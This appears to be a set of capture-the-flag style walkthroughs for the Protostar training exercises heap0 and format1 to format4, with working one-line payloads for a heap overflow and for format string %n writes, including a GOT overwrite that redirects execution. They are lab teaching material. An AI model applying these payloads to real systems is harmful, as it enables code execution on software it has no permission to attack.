Exploit Exercises Protostar — heap0

Heap allocations 101. Overflowing heap-based buffer and overwriting function pointer. Nothing fancy here.

user@protostar:~/dojo$ objdump -t ./heap0 | grep winner
08048464 g F .text 00000014 winner
08048478 g F .text 00000014 nowinner
user@protostar:~/dojo$ ./heap0 `python -c 'print "A"*72+"\x64\x84\x04\x08"'`
data is at 0x804a008, fp is at 0x804a050
level passed

Exploit Exercises Protostar — format4

Basically we do the same trick as in format3 (order of overwriting: LSB, middle bytes, MSB) but here we need to overwrite address of the exit() function (GOT entry overwrite) with address of the hello() function. Also, this level requires testing under gdb (we need to monitor overwritten value of exit() so we can hit desired address).

user@protostar:~/dojo$ objdump -TR format4
format4: file format elf32-i386

00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 fgets
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 _exit
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 DF *UND* 00000000 GLIBC_2.0 exit
080485ec g DO .rodata 00000004 Base _IO_stdin_used
08049730 g DO .bss 00000004 GLIBC_2.0 stdin

080496fc R_386_GLOB_DAT __gmon_start__
08049730 R_386_COPY stdin
0804970c R_386_JUMP_SLOT __gmon_start__
08049710 R_386_JUMP_SLOT fgets
08049714 R_386_JUMP_SLOT __libc_start_main
08049718 R_386_JUMP_SLOT _exit
0804971c R_386_JUMP_SLOT printf
08049720 R_386_JUMP_SLOT puts
08049724 R_386_JUMP_SLOT exit

user@protostar:~/dojo$ objdump -t format4 |grep hello
080484b4 g F .text 0000001e hello
user@protostar:~/dojo$ python -c 'print "\x24\x97\x04\x08"*1+"%57x-"*3+"NN%n"+"\x08\x25\x97\x04"*2+"%192x-"*5+"NNN%n"+"\x04\x08\x27\x97"*2+"%11x-"*10+"NNNN%n"' > /tmp/input
user@protostar:~/dojo$ cat /tmp/input | ./format4
$� 200- b7fd8420- bffff624-N%�%� 78373525- 3735252d- 35252d78- 4e2d7837- 86e254e-NNN'�'� 25049725- 78323931- 3931252d- 252d7832- 78323931- 3931252d- 252d7832- 78323931- 4e4e4e2d- 8046e25-NNNN
code execution redirected! you win

Protip: Always start with something simple. In all format string exercises I’ve started with basic string which prints the values from the stack (e.g. here I started with python -c 'print "ABCD"*2+"%08x-"*10' | ./format4). This allows you to see what’s the layout of the stack and how can you control it. After that it’s a matter of trial and error.

Exploit Exercises Protostar — format3

Nothing new here.

user@protostar:~/dojo$ objdump -t ./format3 |grep target
080496f4 g O .bss 00000004 target
user@protostar:~/dojo$ python -c 'print "\xf4\x96\x04\x08"*1+"%2x"*11+"%n"+"\x08\xf5\x96\x04"*2+"%57x"*9+"AAAABBBB%n"+"\x96\x04\x08\xf7"*2+"%32x"*13+"AAAA%n"' > /tmp/input
user@protostar:~/dojo$ cat /tmp/input | ./format3
�� 0bffff5e0b7fd7ff4 0 0bffff7e8804849dbffff5e0200b7fd8420bffff62���� 25783225 32257832 78322578 25783225 32257832 78322578 25783225 32257832 86e2578AAAABBBB���� 250496f5 25783735 25783735 25783735 25783735 25783735 25783735 25783735 25783735 41783735 42414141 25424242 804966eAAAA
you have modified the target :)

The only thing worth mentioning is that we overwrite target via 3 arbitrary writes. First we overwrite LSB with 0x44, then we overwrite two middle bytes with 0x0255, and finally we overwrite MSB with 0x01. Of course we’re not doing this with surgical precision, instead we’re using tricks such as iterating to the desired value and then writing it to the target.

I must admit — playing with format string vulnerabilities is fun. Especially when you’re aligning things.

Exploit Exercises Protostar — format2

user@protostar:~/dojo$ objdump -t format2 |grep target
080496e4 g O .bss 00000004 target
user@protostar:~$ python -c 'print "\xe4\x96\x04\x08"*4+"%08x"*6+"%n"' > /tmp/input
user@protostar:~/dojo$ cat /tmp/input | ./format2
you have modified the target :)

Behind the scenes: Each byte of the address is treated as character, hence we initially print 16 characters (4*4 = 16) however some of them aren’t printable that’s why we don’t see them. Next we print 6 bytes from the stack, each byte is made of 8 characters (6*8 = 48). Finally we’re using %n specifier that writes number of printed characters, which is 64 (16 + 48 = 64), to address controlled by us (it’s just the way it works).

Acute reader will notice that in this level we’re using pipes again (instead of standard argv). This results in different stack layout. I encourage the reader to examine it under gdb (or just play with format strings!).

Again, if something is not clear then go read previous references.

Exploit Exercises Protostar — format1

user@protostar:~/dojo$ objdump -t ./format1 |grep target
08049638 g O .bss 00000004 target
user@protostar:~/dojo$ ./format1 `python -c 'print "\x38\x96\x04\x08"*3+"%08x-"*130+"%n"'`
8�8�8�0804960c-bffff558-08048469-b7fd8304-b7fd7ff4-bffff558-08048435-bffff724-b7ff1040-0804845b-b7fd7ff4-08048450-00000000-bffff5d8-b7eadc76-00000002-bffff604-bffff610-b7fe1848-bffff5c0-ffffffff-b7ffeff4-0804824d-00000001-bffff5c0-b7ff0626-b7fffab0-b7fe1b28-b7fd7ff4-00000000-00000000-bffff5d8-6d5f1ad2-470dacc2-00000000-00000000-00000000-00000002-08048340-00000000-b7ff6210-b7eadb9b-b7ffeff4-00000002-08048340-00000000-08048361-0804841c-00000002-bffff604-08048450-08048440-b7ff1040-bffff5fc-b7fff8f8-00000002-bffff71a-bffff724-00000000-bffff9bd-bffff9c8-bffff9d8-bffff9f9-bffffa0c-bffffa16-bfffff06-bfffff1a-bfffff58-bfffff6c-bfffff7d-bfffff85-bfffff95-bfffffa2-bfffffd4-bfffffe0-00000000-00000020-b7fe2414-00000021-b7fe2000-00000010-078bfbff-00000006-00001000-00000011-00000064-00000003-08048034-00000004-00000020-00000005-00000007-00000007-b7fe3000-00000008-00000000-00000009-08048340-0000000b-000003e9-0000000c-00000000-0000000d-000003e9-0000000e-000003e9-00000017-00000001-00000019-bffff6fb-0000001f-bffffff2-0000000f-bffff70b-00000000-00000000-00000000-39000000-ed60b676-6ad6c95a-2372bffd-69f406d8-00363836-00000000-00000000-2f2e0000-6d726f66-00317461-08049638-08049638-you have modified the target :)

Exploiting Format String Vulnerabilities is kinda self-explanatory, so there’s nothing to be said here.